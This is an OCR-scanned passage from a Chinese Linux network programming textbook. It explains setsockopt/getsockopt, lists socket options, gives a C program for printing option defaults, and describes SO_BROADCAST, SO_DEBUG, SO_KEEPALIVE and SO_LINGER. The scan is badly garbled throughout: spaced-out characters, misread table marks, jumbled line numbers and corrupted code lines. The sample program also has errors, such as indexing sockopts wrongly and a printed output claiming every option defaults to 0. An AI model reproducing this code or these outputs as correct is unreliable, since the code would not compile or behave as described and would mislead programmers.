行 出 现 问题 的 时 候 ， 返 回 值 为 -1， 错 误 代 码 可 以 从 errno 中 获得 ， 其 含义 如 下 所 述 。 


口 


口 
口 
口 
口 


EBADF: 参数 s 不 是 有 效 的 文件 描述 符 。 

EFAULT: optval 指向 的 内 存 并 非 有 效 的 进程 空间 的 错误 。 
EINVAL: 在 调用 setsockopt() 函 数 时 ，optlen 无 效 。 
ENOPROTOOPT: 指定 的 协议 层 不 能 识别 选项 。 
ENOTSOCK: s 描述 的 不 是 套 接 字 描 述 符 。 


12.1.2” 套 接 字 选 项 
按照 参数 选项 级 别 level 值 的 不 同 ， 套 接 字 选项 大 致 可 以 分 为 以 下 3 类 。 


口 


口 


通用 套 接 字 选项 : 参数 level 的 值 为 SOL_ SOCKET， 用 于 获取 或 者 设置 通用 的 一 
些 参数 ， 例 如 接收 和 发 送 的 缓冲 区 大 小 、 地 址 重用 等 。 

IP 选项 : 参数 level 的 值 为 IPPROTO_IP， 用 于 设置 或 者 获取 卫 层 的 参数 ， 例 如 选 
项 名 IP_HDRINCL 表示 在 数据 中 包含 耳 头 部 数据 IP_TOS 表示 服务 类 型 .IP_TTL 
表示 存活 时 间 等 。 

TCP 选项 : 参数 level 的 值 为 IPPROTO_TCP， 用 于 获得 或 者 设置 TCP 协议 层 的 一 
些 参数 。 例 如 选项 名 TCP_ MAXRT 对 最 大 重 传 时 间 进 行 操作 、 选 项 名 
TCP_MAXSEG 对 最 大 分 片 大 小 进行 操作 、 选 项 名 TCP KEEPALIVE 对 保持 连接 
时 间 进 行 操作 。 


表 12.1 是 选项 级 别 和 选项 名 的 一 个 表格 ,并 对 其 含义 进行 了 简单 的 介绍 ,其 中 的 optval 
表示 操作 选项 的 类 型 。 最 后 两 列 set 和 get 表示 此 种 选项 对 setsockopt() 还 是 对 getsockopt() 
函数 有 效 ( v 表示 有 效 ，X 表 示 无 效 )。 
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表 12.1 套 接 字 选项 含义 


level pinane 含 义 apival i | 
(选项 级 别 ) (选项 名 ) (数据 类 型 ) 

SO BROADCAST 表示 允许 发 送 广播 数据 报 int V | 7v 

SO_DEBUG 表示 调试 跟踪 int V | 7v 
SO_DONTROUTE 表示 不 进行 路 由 表 查 询 int V | V 

SO_ERROR 表示 获取 错误 int x|y 

SO KEEPALIVE 表示 保持 连接 int Vy 

SO_LINGER 表示 延迟 关闭 连接 struct linger V | v 
SO_OOBINLINE 表示 带 外 数据 放 入 正常 数据 流 | int 4 | 

人 SO_RCVBUF 表示 接收 缓冲 区 大 小 int V | >v 
于 |sO_ SNDBUF 表示 发 送 缓冲 区 大 小 int 4 | 
SO RCVLOWAT 表示 接收 缓冲 区 下 限 int V | Y 
SO_SNDLOWAT 表示 发 送 缓冲 区 下 限 int a | yY 
SO_RCVTIMEO 表示 接收 超时 struct timeval V | Y 

SO_SNDTIMEO 表示 发 送 超时 struct timeval Vv | 7Y 
SO_REUSEADDR 表示 人 允许 本 地 地 址 重用 int V | y 

SO_TYPE 表示 获取 套 接 字 类 型 int 了 攻 / 
SO_BSDCOMPAT 表示 BSD 系统 兼容 int V | 7Y 

IP HDRINCL 表示 在 数据 报 中 包含 IP 头 部 |int VY|y 

IP OPTIONS 表示 IP 头 部 选项 structip options | Y | J 

IP RECVDSTADDR 表示 目的 人 P 地 址 int Vv | yv 

IP_ RECVIF 表示 接收 数据 的 网 络 接口 int V | vV 

IP_TOS 表示 服务 类 型 int V | V 

IP_TTL 表示 存活 时 间 int Vv | y 
IP MULTICAST IF 表示 设置 发 送 网 络 接口 in_addr YI 

IP MULTICAST TTL 表示 设置 发 送 的 TTL uchar VY|y 

IP MULTICAST LOOP ”| 表示 设置 是 否 回 环 接口 uchar YI 

IP ADD MEMBERSHIP | 表示 加 入 多 播 组 ip_mreq X | Y 

IP_DROP_ MEMBERSHIP | 表示 离开 多 播 组 ip_mreq x|y 

TCP KEEPALIVE 表示 设置 保持 连接 时 间 int V | v 

TCP_ MAXRT 表示 TCP 最 大 重 传 时 间 int VY|y 

oi TCP MAXSEG 表示 TCP 最 大 分 片 大 小 int | 
TCP NODELAY 表示 禁止 Nagle 算法 int vv|y 

TCPSTDURG 表示 紧急 指针 int VI|y 


12.1.3” 套 接 字 选 项 简单 示例 


12.1.2 节 中 介绍 了 套 接 字 的 选项 , 本 节 将 介绍 如 何 使 用 这 些 套 接 字 选项 进行 程序 设计 。 
下 面 的 例子 显示 本 系统 中 可 能 支持 的 套 接 字 选项 的 状态 ， 在 一 个 程序 中 获得 系统 所 支持 的 
套 接 字 选项 的 默认 值 ， 并 将 结果 打印 出 来 。 


“a 


.定义 选项 所 用 的 通用 数据 结构 


结构 optval 是 一 个 枚 举 类 型 的 结构 ， 它 包含 了 整 型 、linger 类 型 、 时 间 结 构 、 
本 这 些 类 型 基本 上 可 以 满足 套 接 字 获取 时 的 数据 传 出 。 


01 #include <netinet/tcp .h> 
02 #include <sys/types.h> 
03 #include <sys/socket.h> 
04 #include <stdio.h> 

05 #include <unistd.h> 

06 #include <netinet/in.h> 
07 /* 结 构 保 存 获取 结果 */ 

08 typedef union optval { 


09 int val; /* 整 型 值 */ 

10 struct linger linger; /*1inger 结构 */ 
hm struct timeval tyv; /* 时 间 结 构 */ 

12 unsigned char str[16]; /x* 字 符 串 */ 

13 J}val; 

14 static val optval; /* 用 于 保存 数值 */ 


上 述 代码 定义 一 个 联合 的 结构 类 型 ， 用 于 统一 处 理 getsockopt() 函 数 的 返回 值 。 
2. 数据 类 型 的 定义 


通用 数据 结构 对 应 分 别 定义 了 整 型 、linger 类 型 、 时 间 结 构 、 字 符 串 等 类 型 的 常量 ， 
自 于 表示 使 用 的 数据 类 型 。 


15 ” /* 数 值 类 型 */ 
16 typedef enum valtype{ 


i VALINT, /*int 类 型 */ 

18 VALLINGER, /*struct linger 类 型 */ 
19 VALTIMEVAL, /*struct timeval 类 型 */ 
20 VALUCHAR, /* 字 符 串 */ 

2 VALMAX /* 错 误 类 型 */ 


22 J}valtype; 
上 述 枚 举 类 型 定义 数据 结构 类 型 的 值 ， 便 于 查找 返回 值 的 类 型 。 
3. 列举 的 套 接 字 选 项 


下 面 的 代码 将 需要 取出 的 套 接 字 选 项 放 在 一 个 数组 sockopts 中 ， 便 于 程序 设计 。 


23 /* 用 于 保存 套 接 字 选 项 的 结构 */ 
24 typedef struct soptst{ 


25 int level; /* 套 接 字 选项 级 别 */ 

26 int optname; /* 套 接 字 选项 名 称 */ 

2 char *name; /* 套 接 字 名 称 */ 

28 valtype valtype; /* 套 接 字 返回 参数 类 型 */ 

29 jsopts7 

30 sopts sockopts[] = { 

31 {SOL_ SOCKET, SO_BROADCAST, "SO_BROADCAST", VALINT}, 
导 之 {SOL SOCKET, SO DEBUG, "SO DEBUG", VALINT}, 
叶 流 {SOL_ SOCKET, SO_DONTROUTE, "SO_DONTROUTE", VALINT}, 
34 {SOL SOCKET, SO ERROR, "SO ERROR", VALINT}, 
Ek {SOL_ SOCKET, SO_KEEPALIVE, "SO_KEEPALIVE", VALINT}, 
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{SOL SOCKET, SO_LINGER, "SO_LINGER", VALINT}, 
{SOL SOCKET, SO OOBINLINE, "SO OOBINLINE", VALINT}, 
{SOL SOCKET, SO_RCVBUF, "SO_RCVBUF", VALINT}, 
{SOL SOCKET, SO RCVLOWAT, "SO RCVLOWAT", VALINT}, 
{SOL SOCKET, SO_RCVTIMEO, "SO RCVTIMEO", VALTIMEVAL}, 
{SOL SOCKET, sO SNDTIMEO, "SO SNDTIMEO", VALTIMEVAL}, 
{SOL_ SOCKET, SO_TYPE, "SO_TYPE", VALINT}, 
{IPPROTO IP, IP HDRINCL, "IP HDRINCL", VALINT}, 
{IPPROTO_IP, IP_OPTIONS, "IP_OPTIONS", VALINT}, 
{IPPROTO IP, IP_TOS， nipaTOSU VALINT}, 
{IPPROTO_IP, PPE re VALINT}, 


{IPPROTO_IP, IP MULTICAST TTL, "IP MULTICAST TTL",VALUCHAR}, 
{IPPROTO IP, IP MULTICAST LOOP,"IP MULTICAST LOOP",VALUCHAR}, 


{IPPROTO TCP, TCP KEEPCNT, "TCP KEEPCNT™, VALINT}, 
{IPPROTO TCP, TCP MAXSEG, "TCP MAXSEG", VALINT}, 
{IPPROTO TCP, TCP NODELAY, "TCP_NODELAY", VALINT}, 
/* 结 尾 , 主 程序 中 判断 VALMAX*/ 

{0, 0， NULL, VALMAX} 


}; 


上 述 结构 和 变量 将 所 有 可 能 支持 的 选项 类 型 定义 成 一 个 数组 ， 便 于 在 主 程序 中 轮 询 。 
其 中 变量 sockopts 最 后 的 一 个 数组 成 员 valtype 的 值 为 VALMAX, 在 主 程序 中 判断 valtype 
是 否 为 VALMAX， 就 可 以 知道 是 否 到 达 数 组 的 末尾 。 


4. 显示 查询 结果 disp_outcome() 


disp_outcome(O 函 数 根据 用 户 输入 的 选项 类 型 ， 将 套 接 字 选项 的 设置 打印 出 来 。 


55 
56 
5 
58 


/* 显 示 查 询 结果 */ 
static void disP_outcome (Sopts *sockopt, int len, int err) 
. 
if(err == -1){ /* 错 误 */ 
printf ("optname %s NOT support\n",sockopt->name); 
return; 
i 
switch(sockopt->valtype) { /* 根 据 不 同 的 类 型 进行 信息 打印 */ 
case VALINT: /* 整 型 */ 


printf ("optname %s: default is %d\n",sockopt->name, 
optval .val); 
break; 
case VALLINGER:/*struct linger*/ 
printf ("optname $s: default is %d(ON/OFF), %d tolinger\n", 


sockopt->name, /* 名 称 */ 
optval.linger.1 onoff, /*linger 打开 */ 
optval.linger.] linger); /* 延 时 时 间 */ 

break; 

case VALTIMEVAL: /*struct timeval 结构 */ 

printf ("optname %s: default is %.06f\n", 

sockopt->name, /* 名 称 */ 
/* 浮 点 型 结果 */ 


((((double)optval.tv.tv_sec*100000+(double)optval.tv.tv_usec))/(doub 


le)1000000)); 


79 
80 
81 
82 


"3. 


break; 
case VALUCHAR: /* 字 符 串 类 型 ,循环 打印 */ 
{ 
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83 printf ("optname %s: default is ",sockopt->name); 
84 /* 选 项 名 称 */ 

85 for(i = 0; i < len; i++){ 

86 PrintE( S02 " Optval, Str trl 
87 } 

88 Printf(m\nsys 

89 } 

90 break; 

91 default: 

92 break; 

93 } 

94 1} 


上 述 代码 根据 不 同 的 返回 值 类 型 进行 显示 结果 ， 其 中 包含 int 类 型 、struct linger 类 型 、 
struct timeval 结构 类 型 和 字符 串 uchar 类 型 。 对 于 timeval 类 型 将 tv_usec 和 tv_sec 生成 一 
个 浮 点 型 的 值 ， 以 秒 为 单位 来 显示 时 间 。 对 于 char 类 型 的 多 个 变量 需要 根据 得 到 的 len 来 
计算 需要 打印 的 字符 串 长 度 。 

5. 主 函 数 main() 

主 函数 main() 轮 循 数 组 sockopts 中 的 每 一 项 ， 将 选项 的 值 打印 出 来 。 


95 int main(int argc, char *argv[]) 


96 { 

97 int err 一" 一 

98 socklen t len = 0; 

99 int i = 0; 

00 int s = socket (AF_INET，SOCK_ STREAM，0);  ”/* 建 立 一 个 流 式 套 接 字 */ 
01 while (sockopts [i] .valtype != VALMAX) {  /* 判 断 是 否 结尾 , 否则 轮 询 执行 */ 
96 len = sizeof (sopts); /* 计 算 结 构 长 度 */ 

97 er = getsockopt(s, sockopts->level, sockopts->optname, 
&optval, &len) ; /* 获 取 选 项 状态 */ 

98 

99 disp outcome(&sockopts[i], len, err); /* 显 示 结 果 */ 

00 i++;/* 递 增 */ 

01 } 

02 close(s); 

03 return 0; 

04 } 


主 函数 在 建立 一 个 流 式 的 socket 后 ， 使 用 sockopts 变量 进行 轮 询 查 询 选项 的 默认 值 。 
6. 代码 的 编译 执行 
将 上 述 代码 保存 为 sopts_get.c， 编 译 : 


$gcc -Oo sopts_get sopts get.c 


执行 可 执行 文件 sopts_get 后 的 结果 如 下 ， 可 知 默认 情况 下 的 系统 设置 基本 为 0。 


$ ./sopts_get 

optname SO BROADCAST: default is 0 # SO_BROADCAST 的 默认 值 为 0 
optname SO_DEBUG: default is 0 # SO_DEBUG 的 默认 值 为 0 
optname SO DONTROUTE: default is 0 # SO_DONTROUTE 的 默认 值 为 0 
optname SO_ERROR: default is 0 # SO_ERROR 的 默认 值 为 0 
optname SO KEEPALIVE: default is 0 # SO_KEEPALIVE 的 默认 值 为 0 


sr 


第 2 篇 Linux 用 户 层 网 络 编程 


SO _LINGER 的 默认 值 为 0 
SO_OOBINLINE 的 默认 值 为 0 
SO_RCVBUF 的 默认 值 为 0 


optname SO LINGER: default is 0 
optname SO OOBINLINE: default is 0 
optname SO _ RCVBUF: default is 0 
optname SO RCVLOWAT: default is 0 SO_RCVLOWAT 的 默认 值 为 0 
optname SO RCVTIMEO: default is 0.000000 SO_RCVTIMEO 的 默认 值 为 0 


optname 
optname 
optname 


SO_TYPE: default is 0 
IP_HDRINCL: default is 0 
IP_OPTIONS: default is 0 


SO_TYPE 的 默认 值 为 0 
IP_HDRINCL 的 默认 值 为 0 
IP_OPTIONS 的 默认 值 为 0 


# 
# 
# 
# 
# 
optname SO_SNDTIMEO: default is 0.000000  # SO_SNDTIMEO 的 默认 值 为 0 
# 
# 
# 
# 


optname IP TOS: default is 0 IP_TOS 的 默认 值 为 0 
optname IP TTL: default is 0 IP_TTL 的 默认 值 为 0 
optname IP MULTICAST TTL: default is 00 00 00 00 

# IP_MULTICAST_TTL 的 默认 值 为 0 

optname IP MULTICAST LOOP: default is 00 00 00 00 

# IP_MULTICAST_LOOP 的 默认 值 为 0 
optname TCP KEEPCNT: default is 0 
optname TCP MAXSEG: default is 0 
optname TCP NODELAY: default is 0 


# TCP_KEEPCNT 的 默认 值 为 0 
# TCP_MAXSEG 的 默认 值 为 0 
# TCP_NODELAY 的 默认 值 为 0 


12.2 SOL SOCKET 协议 族 选 项 


SOL SOCKET 级 别 的 套 接 字 选 项 是 通用 类 型 的 套 接 字 选 项 ， 这 个 选项 中 可 以 使 用 的 
命令 字 比 较 多 , 例如 有 SO_BROADCAST、SO_KEEPALIVE、SO_LINGE、SO_OOBINLINE、 
SO_RCVBUFF、SO_SNDBUFF 等 命令 字 对 套 接 字 的 基本 特性 进行 控制 。 


12.2.1 SO_BROADCAST 广播 选项 


SO_BROADCAST 广播 选项 用 于 进行 广播 设置 ， 默 认 情 况 下 系统 的 广播 是 禁止 的 ， 因 
为 很 容易 误 用 广播 的 功能 造成 网 络 灾 难 。 为 了 避免 偶尔 的 失误 造成 意外 ， 默 认 情 况 下 套 接 
口 禁用 了 广播 。 如 果 确 实 需要 使 用 广播 功能 ， 需 要 用 户 打 开 此 功能 。 

广播 使 用 UDP 套 接 字 ， 其 含义 是 允许 将 数据 发 送 到 子 网 网 络 的 每 个 主机 上 。 此 项 选 
项 的 输入 数据 参数 是 一 个 整 型 变量 。 当 输入 的 值 为 0 时 ， 表 示 禁 止 广播 ， 其 他 值 表 示人 允许 
广播 。 例 如 下 面 的 程序 允许 在 局 域 网 内 进行 广播 : 


#define YES 1 /* 设 置 有 效 */ 
#define NO 0 /* 设 置 无 效 */ 
int s; /+ 套 接 字 变 量 */ 
int err; /* 错 误 值 */ 
int optval = YES; /+* 将 选项 设置 为 有 效 */ 
s = socket (AF INET, SOCK DGRAM,0); /* 建 立 套 接 字 */ 
err = setsockopt( /#* 设 置 选项 */ 
S 
SOL SOCKET, 
SO_BROADCAST, /*SO_BROADCAST 选项 */ 
&optval, /* 值 为 有 效 */ 
sizeof (optval)); /* 值 的 长 度 #/ 
if(err) /* 判 断 是 否 发 生 错 误 */ 
perror ("setsockopt"); /* 打 印 错误 信息 */ 


.334 。 
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如 果 setsockopt(O) 函 数 返 回 为 0, 套 接 字 s 已 经 允许 进行 广播 需要 注意 ,必须 使 用 socket 
(AF_INET, SOCK DGRAM.0) 建立 一 个 UDP 套 接 字 。 


全 注意 : 广播 功能 需要 网 络 类 型 的 支持 , 例如 点 对 点 的 网 络 架构 就 不 能 进行 广播 功能 设置 。 


12.2.2 SO_DEBUG 调试 选项 


SO_DEBUG 调试 选项 表示 允许 调试 套 接 字 ， 此 选项 仅 支持 TCP， 当 打开 此 选项 时 ， 
Linux 内 核 程序 跟踪 在 此 套 接 字 上 的 发 送 和 接收 的 数据 ， 并 将 调试 信息 放 到 一 个 环形 缓冲 
区 中 。 例 如, 下面 的 代码 将 TCP 套 接 字 设置 为 可 调试 。 进 行 数据 收发 后 , 可 以 使 用 命令 trpt 
来 查看 跟踪 结果 。 


#define YES 1 /* 设 置 有 效 */ 
#define NO 0 /* 设 置 无 效 */ 
int s; /* 套 接 宁 变量 */ 
int err; /* 错 误 值 */ 
int optval = YES; /* 将 选项 设置 为 有 效 */ 
s = socket (AF_INET,SOCK STRERM,0) /* 建 立 一 个 TCP 套 接 字 */ 
err = setsockopt( /* 设 置 选项 x/ 
Ss, 
SOL_ SOCKET, 
SO_DEBUG, /*SO_DEBUG 选项 */ 
&optval, /* 值 为 有 效 */ 
sizeof (optval)); /* 值 的 长 度 */ 


12.2.3 SO_DONTROUTE 不 经 过 路 由 选项 


SO_DONTROUTE 选项 的 设置 使 发 出 的 数据 分 组 不 经 过 正常 的 路 由 机 制 。 分 组 将 按照 
发 送 数 据 的 目的 地 址 和 子 网 拖 码 选择 一 个 合适 的 网 络 接口 进行 发 送 ,而 不 用 经 过 路 由 机 制 。 
如 果 不 能 由 选 定 的 网 络 接口 确定 ， 则 会 返回 ENETUNREACH 错误 。 选 项 设置 后 ， 网 络 数 
据 不 通过 网 关 发 送 , 只 能 发 送 给 直接 连接 的 主机 或 者 一 个 子 网 内 的 主机 。 可 以 通过 将 send0 
函数 的 选项 设置 中 加 上 MSG_DONTROUTE 标志 来 实现 相同 的 效果 。 选项 的 值 是 布尔 型 整 
数 的 标识 。 

这 个 选项 可 以 在 两 个 网 卡 的 局 域 网 内 使 用 ,系统 根据 发 送 的 目的 卫 地 址 ， 自 动 匹配 合 
适 的 子 网 ， 例 如 将 子 网 A 的 数据 发 送 到 网 络 接口 B 上 。 


12.2.4 SO_ERROR 错误 选项 


这 个 选项 用 来 获得 套 接 字 错误 ， 此 套 接 字 选 项 仅 能 够 获取 而 不 能 进行 设置 。 在 Linux 
内 核 中 的 处 理 过 程 如 下 所 述 。 
(1) 当 套 接 字 发 生 错误 的 时 候 ， 兼 容 BSD 的 网 络 协议 将 内 核 中 的 变量 so_error 设置 为 
形 如 UNIX_Exxx 的 值 。 
(2) 内 核 通过 两 种 方式 通知 用 户 进程 
口 如 果 进 程 通过 使 用 函数 select0 阻 塞 ， 则 函数 会 返回 -1， 并 将 查询 的 套 接 字 描 述 符 
的 集合 中 一 个 或 者 两 个 集合 进行 设置 。 当 检查 可 读 时 ， 可 读 的 套 接 字 描 述 符 集 和 


Se 
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错误 描述 符 集 进行 设置 ， 当 检查 写 时 ， 可 写 套 接 字 描述 符 集 和 错误 描述 符 集 进行 
设置 。 
口 如 果 使 用 信号 驱动 IO 模型 ， 则 进程 或 者 进程 组 收 到 SIGIO 信号 。 
(3) 进程 在 返回 后 ,可 以 通过 函数 getsockopt() 的 SO_ERROR 选项 获得 发 生 的 错误 号 ， 
这 个 值 通 过 一 个 int 类 型 的 变量 获得 。 


全 注意 : 当 读 数据 出 错时 ， 返 回 值 为 -1， 则 so_error 为 非 零 值 ，errno 为 so_error 的 值 ; 当 
返回 值 为 数据 长 度 的 时 候 ，so_error 为 0。 当 写 数 据 出 错时 ， 返 回 -1， 则 此 时 的 
SO_error 为 非 零 值 ， errno 为 so_error 的 值 ; 当 写 数据 的 返回 值 为 数据 长 度 的 时 候 ， 
sO_error 的 值 为 0。 


12.2.5 SO_KEEPALIVE 保持 连接 选项 


选项 SO_KEEPALIVE 用 于 设置 TCP 连接 的 保持 ， 当 设置 此 项 后 ， 连 接 会 测试 连接 的 
状态 。 这 个 选项 用 于 可 能 长 时 间 没 有 数据 交流 的 连接 ， 通 常 在 服务 器 端 进行 设置 。 
当 设 置 SO_ KEEPALIVE 选项 后 ， 如 果 在 两 个 小 时 内 没有 数据 通信 时 ，TCP 会 自动 发 
送 一 个 活动 探测 数据 报 文 ， 对 方 必须 对 此 进行 响应 ， 通 常 有 如 下 3 种 情况 。 
口 TCP 的 连接 正常 ， 发 送 一 个 ACK 响应 ， 这 个 过 程 应 用 层 是 不 知道 的 。 再 过 两 个 小 
时 ， 又 会 再 发 送 一 个 。 
口 对 方 发 送 RST 响应 ， 对 方 在 2 个 小 时 内 进行 了 重启 或 者 崩溃 。 之 前 的 连接 已 经 失 
效 ， 套 接 字 收 到 一 个 ECONNRESET 错误 ， 之 前 的 套 接 字 关 闭 。 
口 如 果 对 方 没有 任何 响应 , 则 本 机 会 发 送 另 外 8 个 活动 探测 报 文 , 时 间 的 间隔 为 75s。 
当 第 一 个 活动 报 文 发 送 11 分 15 秒 后 仍然 没有 收 到 对 方 的 任何 响应 ， 则 放弃 探测 ， 
套 接 字 错误 类 型 设置 为 ETIMEOUT， 并 关闭 套 接 字 连 接 。 如 果 收 到 一 个 ICMP 控 
制 报 文 响 应 ， 此 时 套 接 字 也 关闭 ， 这 种 情况 通常 收 到 的 是 一 个 主机 不 可 达 的 ICMP 
报 文 ， 此 时 套 接 字 错 误 类 型 设置 为 EHOSTUNREACH， 并 关闭 套 接 字 连 接 。 
SO_KEEPALIVE 的 使 用 场景 主要 是 在 可 能 发 送 长 时 间 无 数据 响应 的 TCP 连接 ， 例 如 
telnet 会 话 ， 经 常会 出 现 打 开 一 个 telnet 客户 端 后 长 时 间 不 用 的 情况 ， 这 需要 服务 器 或 者 客 
户 端 有 一 个 探测 机 制 知道 对 方 是 否 仍然 活动 。 根 据 探测 结果 服务 器 会 释放 已 经 失效 的 客户 
端 ， 保 证 服务 器 资源 的 有 效 性 ， 例 如 有 的 telnet 客户 端 没有 按照 正常 步骤 进行 关闭 。 
下 面 的 代码 是 一 个 设置 保持 连接 的 例子 ， 显 示 了 怎样 在 一 个 套 接口 s 上 使 用 
SO_KEEPALIVE 选项 ， 从 而 可 以 检测 到 一 个 断 开 的 空闲 连接 。 


#define YES 1 /* 设 置 有 效 */ 
#define NO 0 /* 设 置 无 效 */ 
Ln /* 套 接 字 变量 */ 
int err; /* 错 误 值 */ 
int optval = YES; /* 将 选项 设置 为 有 效 */ 
err = setsockopt( /* 设 置 选项 #/ 
Sr 
SOL_ SOCKET， 
SO_KEEPALIVE, /*SO_KEEPALIVE 选项 */ 
&optval, /* 值 为 有 效 */ 
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sizeof (optval)); /* 值 的 长 度 */ 
if (err) /* 判 断 是 否 发 生 错误 */ 
perror ("setsockopt"); /* 打 印 错误 信息 */ 


选项 SO_KEEPALIVE 所 使 用 的 机 制 通常 会 影响 到 其 他 应 用 程序 ， 而 且 活 动 探测 以 2 
个 小 时 为 周期 , 不 能 实时 地 探测 连接 情况 , 当 没 有 响应 的 时 候 还 需要 约 11 分 钟 的 超时 时 间 。 
但 是 ， 这 样 一 种 框架 确实 可 以 探测 空闲 的 连接 ， 然 后 自动 关闭 服务 器 连接 。 


12.2.6 SO_LINGER 缓冲 区 处 理 方式 选项 


选项 SO_LINGER 用 于 设置 TCP 连接 关闭 时 的 行为 方式 ， 就 是 关闭 流 式 连接 时 ， 发 送 
缓冲 区 中 的 数据 如 何 处 理 。 


1. SO_LINGER 选项 的 含义 


Linux 内 核 的 默认 处 理 方式 是 当 用 户 调用 close(O) 函 数 时 ， 函 数 会 立刻 返回 。 在 可 能 的 
情况 下 ， 尽 量 发 送 缓冲 区 中 的 数据 ， 但 是 并 不 一 定 保证 会 发 送 剩 余 的 数据 ， 这 造成 了 剩余 
数据 的 不 可 确定 性 。 因 为 close() 函 数 立 刻 返 回 ， 用 户 没有 办 法 知道 剩余 数据 的 处 理 情况 。 

使 用 选项 SO_LINGER 可 以 阻塞 close() 函 数 的 调用 ， 直 到 剩余 数据 全 部 发 送 到 对 方 。 
且 这 可 以 保证 TCP 连接 两 端的 正常 关闭 , 或 者 获得 错误 的 情况 。 如果 需 要 程序 立刻 关闭 ， 
可 以 设置 结构 linger 中 的 值 ， 此 时 调用 close0O) 函 数 的 时 候 ， 会 丢弃 发 送 缓冲 区 内 的 数据 ， 
立刻 关闭 连接 。 

选项 SO_LINGER 的 操作 是 通过 结构 struct linger 来 进行 的 ， 结 构 定义 如 下 : 

struct linger { 

Ine onore, /* 是 否 设 置 延 时 关闭 */ 
int 1 linger; /* 超 时 时 间 */ 


ja 


成 员 1 onoff 为 0 或 者 非 0， 设 置 结构 linger 的 值 可 以 形成 以 下 3 种 不 同 的 关闭 连接 
广 式 。 
口 设置 1 onoff 的 值 为 0, 这 时 成 员 1 linger 将 被 忽略 ， 使 用 系统 默认 关闭 行为 。 这 种 
情况 与 没有 设置 SO_LINGER 的 状态 是 一 致 的 ，close() 函 数 会 立即 返回 调用 者 ， 发 
送 缓冲 区 内 数据 的 处 理 方式 未 知 。 
口 设置 1 onoff 的 值 为 1, 此 时 成 员 L_linger 表示 关闭 连接 的 超时 时 间 。 此 时 的 L_linger 
的 值 变 得 至 关 重要 ， 当 为 非 0 时 ， 表 示 的 为 超时 的 秒 数 ， 会 在 超时 之 前 发 送 所 有 
未 发 送 的 数据 。 如 果 发 送 成 功 ， 则 close0) 函 数 返 回 值 为 0， 发 送 失败 将 返回 错误 ， 
变量 errno 的 值 为 EWOULDBLOCK。 
口 设置 1 onoff 的 值 为 1，1 linger 的 值 设置 为 0， 表示 立刻 关闭 。 此 时 调用 close() 函 
数 将 立刻 返回 ， 并 且 发 送 缓冲 区 里 面 的 剩余 数据 将 被 丢弃 。 


2. 套 接 字 关闭 的 过 程 


关闭 行为 的 默认 情况 如 图 12.1 所 示 , 主机 A 的 close0) 函 数 调用 后 会 立刻 返回 , 主机 B 
是 否 接收 到 之 前 write() 函 数 发 送 的 数据 的 情况 不 明 。 
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禄 主机 B 
write() 
closeO es 一 | 接收 到 数据 
立刻 返回 | 
read() 


| 
| 数据 和 FIN 确 认 


| 


close() 


FIN 确 认 - 


图 12.1 close0) 的 默认 情况 


当 设置 了 延迟 关闭 的 超时 时 间 后 , 主机 A 会 在 超时 时 间 内 把 数据 发 送 成 功 , 主机 A 接 
收 到 主机 B 的 write() 成 功 的 确认 后 ， 关 闭 连 接 ， 如 图 12.2 所 示 。 


主机 A 主机 B 
write() 
close() i 一 | 接收 到 数据 
一 | read0 


close() | 数据 和 FIN 确 认 一 一 | 


返回 close() 
FN | 


FIN 确 认 - 


图 12.2 ”延迟 关闭 的 情况 


如 图 12.3 所 示 ， 使 用 函数 shutdown() 进 行 半 连接 关闭 ， 主 机 A 先 关 闭 写 ， 当 收 到 主机 
B 对 之 前 写 入 数据 的 ACK 确认 后 ， 再 进行 关闭 。 


主机 A 主机 B 
write() 
人 一 ~| 接收 到 数据 

关闭 写 并 read() 阻 塞 FIN- | 
read() 

| 

|_ 一 一 数据 和 FIN 确 认 

close() 

FF 一 一 | 

read() 返 回 0 [一 一 
FIN 确 认 - | 


图 12.3 ”使 用 函数 shutdown0) 进 行 半 关闭 获取 对 方 的 数据 接收 情况 
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3. 选项 SO_LINGER 的 例子 


下 面 的 代码 是 一 个 使 用 SO_LINGER 选项 的 例子 ， 使 用 60s 的 超时 时 限 。 


#define YES 1 

#define NO 0 

int s; 

int err; 

struct linger optval; 

optval.l1 onoff = YES; 

optval.1 linger = 60; 

Socket (AF_INET, SOCK DGRAM,0); 
setsockopt ( 


s = 
err = 

Sr 
SOL SOCKET, 

SO_LINGER, 

&optval, 

sizeof (optval)); 
if(err) 

perror ("setsockopt"); 


/* 设 置 有 效 */ 

/* 设 置 无 效 */ 

/* 套 接 字 变 量 */ 

/* 错 误 值 */ 

/* 建 立 一 个 1inger 类 型 的 套 接 字 选 项 变量 */ 
/* 设 置 1inger 生效 */ 

/*1linger 超时 时 间 为 60s*/ 

/* 建 立 套 接 字 */ 

/* 设 置 选项 */ 


/*SO_LINGER 选项 */ 
/* 值 为 有 效 */ 

/* 值 的 长 度 */ 

/* 判 断 是 否 发 生 错 误 */ 
/* 打 印 错误 信息 */ 


调用 close() 函 数 后， 在 60s 之 内 允许 发 送 数据 ， 当 缓冲 区 内 的 数据 发 送 完毕 后 ， 会 正 
常 关闭 ， 如 果 不 能 正常 发 送 数据 ， 则 返回 错误 。 
下面 的 代码 是 立刻 关闭 连接 的 例子 , 进行 如 下 的 设置 后 , 调用 close() 函 数 会 立刻 返回 ， 


并 丢弃 没有 发 送 的 数据 。 


#define YES 1 

#define NO 0 

Pi 

int err; 

struct linger optval; 

optval.l1 onoff = YES; 

optval.l1 linger = 0; 

Socket (AF_INET, SOCK DGRAM,0); 
setsockopt ( 


s= 
上 二 他 
Ss, 
SOL SOCKET, 
SO_LINGER, 
&optval, 
sizeof (optval)); 
if (err) 
perror ("setsockopt"); 


/* 设 置 有 效 */ 

/* 设 置 无 效 */ 

/* 套 接 字 变量 */ 

/* 错 误 值 */ 

/* 建 立 一 个 1inger 类 型 的 套 接 字 选 项 变量 */ 
/* 设 置 1inger 生效 */ 

/*1inger 超时 时 间 为 0s, 立即 生效 */ 

/* 建 立 套 接 字 */ 

/* 设 置 选项 */ 


/*SO_LINGER 选项 */ 
/* 值 为 有 效 */ 

/* 值 的 长 度 */ 

/* 判 断 是 否 发 生 错误 */ 
/* 打 印 错误 信息 */ 


12.2.7 SO_OOBINLINE 带 外 数据 处 理 方式 选项 

带 外 数据 放 入 正常 数据 流 ， 在 普通 数据 流 中 接收 带 外 数据 。 当 进行 了 此 项 的 设置 后 ， 
带 外 数据 不 再 通过 另外 的 通道 获得 ， 在 普通 数据 流 中 可 以 获得 带 外 数据 。 

在 某 些 情况 下 ， 发 送 的 数据 会 超过 所 限制 的 数据 量 。 通 常 这 些 数据 使 用 特殊 的 接收 方 


ss 
